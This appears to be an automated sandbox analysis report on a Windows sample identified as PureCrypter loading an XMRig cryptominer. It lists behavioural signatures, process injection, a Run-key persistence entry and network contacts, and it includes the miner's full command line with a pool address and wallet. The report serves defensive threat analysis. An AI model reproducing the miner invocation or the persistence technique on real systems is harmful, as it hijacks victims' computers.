Analysis Overview
SHA256
14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb
Threat Level: Known bad
The file 14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb was found to be: Known bad.
Malicious Activity Summary
Detect PureCrypter injector
PureCrypter
xmrig
XMRig Miner payload
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-03 20:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-03 20:49
Reported
2023-02-03 20:52
Platform
win10-20220812-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
Detect PureCrypter injector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
PureCrypter
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\cloudapp = "\"C:\\Users\\Admin\\AppData\\Local\\WinSCP\\cloudapp.exe\"" | C:\Users\Admin\AppData\Local\Temp\14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3824 set thread context of 4844 | N/A | C:\Users\Admin\AppData\Local\Temp\14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe |
| PID 4844 set thread context of 3404 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb.exe
"C:\Users\Admin\AppData\Local\Temp\14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 45.142.122.11:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Network
| Country | Destination | Domain | Proto |
| US | 163.123.142.210:80 | 163.123.142.210 | tcp |
| US | 20.44.10.123:443 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| IT | 179.43.155.202:9090 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| IN | 20.207.73.82:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| RU | 45.142.122.11:8080 | tcp |
Files
memory/3824-120-0x000002015AF00000-0x000002015AF2E000-memory.dmp
memory/3824-121-0x00000201755D0000-0x00000201758BA000-memory.dmp
memory/3824-122-0x000002015B320000-0x000002015B342000-memory.dmp
memory/4848-123-0x0000000000000000-mapping.dmp
memory/4848-130-0x000001EAC3F90000-0x000001EAC4006000-memory.dmp
memory/3824-138-0x00000201759F0000-0x0000020175AAC000-memory.dmp
memory/4844-139-0x0000000000400000-0x000000000048C000-memory.dmp
memory/4844-140-0x0000000000400000-mapping.dmp
memory/4844-141-0x0000022D77E10000-0x0000022D77EAE000-memory.dmp
memory/4844-142-0x0000022D75BB0000-0x0000022D75C06000-memory.dmp
memory/4844-143-0x0000022D775E0000-0x0000022D7762C000-memory.dmp
memory/4844-144-0x0000022D75C90000-0x0000022D75CA6000-memory.dmp
memory/3404-145-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/3404-146-0x0000000140344454-mapping.dmp
memory/3404-147-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/3404-148-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/3404-149-0x0000020A13110000-0x0000020A13130000-memory.dmp
memory/3404-150-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/3404-151-0x0000020A14AD0000-0x0000020A14AF0000-memory.dmp
memory/3404-152-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/3404-153-0x0000020A14AF0000-0x0000020A14B10000-memory.dmp
memory/3404-154-0x0000020A14AF0000-0x0000020A14B10000-memory.dmp